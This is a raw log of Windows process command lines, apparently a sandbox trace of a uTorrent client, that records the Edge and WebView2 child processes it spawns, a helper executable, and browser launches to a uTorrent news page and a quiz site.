--service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=1924 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://utorrent.com/prodnews?v=3%2e6%2e0%2e1%2e47142&pv=0.0.0.0.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0x80,0x10c,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1876 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4656 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 /prefetch:8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=entity_extraction --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=4980 /prefetch:8

C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB6550_606735135 µTorrent4823DF041B09 uTorrent ce unp

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://play2330.atmequiz.com/start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=4432.4316.7987634700710655576

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x1b8,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1828,10188426019090277270,17373410644144937637,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1840 /prefetch:2

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4272 /prefetch:1

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1828,10188426019090277270,17373410644144937637,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1

C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB5BB0_1201853113 µTorrent4823DF041B09 uTorrent ce unp

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=5588 /prefetch:8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=2776.3304.11164077774771384500

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x1b8,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1716,13157676356393165352,13459174796162396494,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1776 /prefetch:2

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1716,13157676356393165352,13459174796162396494,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2064 /prefetch:3

C:\Users\Admin\AppData\Roaming\uTorrent\helper\helper.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\helper\helper.exe" 10702 --hval 8nyQ3yqfzwaO9Vu5 -- -pid 2008 -version 47142

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

